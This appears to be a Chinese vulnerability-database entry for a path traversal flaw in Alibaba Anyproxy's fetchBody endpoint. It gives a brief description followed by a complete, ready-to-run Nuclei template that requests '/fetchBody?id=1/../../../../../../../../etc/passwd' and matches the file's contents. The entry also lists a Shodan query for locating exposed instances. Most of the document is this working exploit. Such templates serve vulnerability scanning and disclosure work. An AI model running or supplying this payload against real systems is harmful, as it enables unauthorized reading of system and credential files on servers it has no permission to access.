alibaba-anyproxy-lfi: Alibaba Anyproxy fetchBody File - Path Traversal

日期: 2025-08-01 | 影响软件: Alibaba Anyproxy | POC: 已公开

漏洞描述

Alibaba Anyproxy is vulnerable to Path Traversal.

PoC代码[已公开]

id: alibaba-anyproxy-lfi

info:
  name: Alibaba Anyproxy fetchBody File - Path Traversal
  author: DhiyaneshDk
  severity: high
  description: Alibaba Anyproxy is vulnerable to Path Traversal.
  reference:
    - https://github.com/alibaba/anyproxy/issues/391
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Alibaba%20AnyProxy%20fetchBody%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"anyproxy"
  tags: alibaba,anyproxy,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/fetchBody?id=1/../../../../../../../../etc/passwd"

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(body, '\"id\":')
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100dbf1cc12913a648dfa82006a1ac71f369bdd4f8c5029ed810d44506b3b4b11bd02206cb95c66f017195756d57fb52ea97726a91a85da16534112178ee3b9b4f96a65:922c64590222798bb761d5b6d8e72950

相关漏洞推荐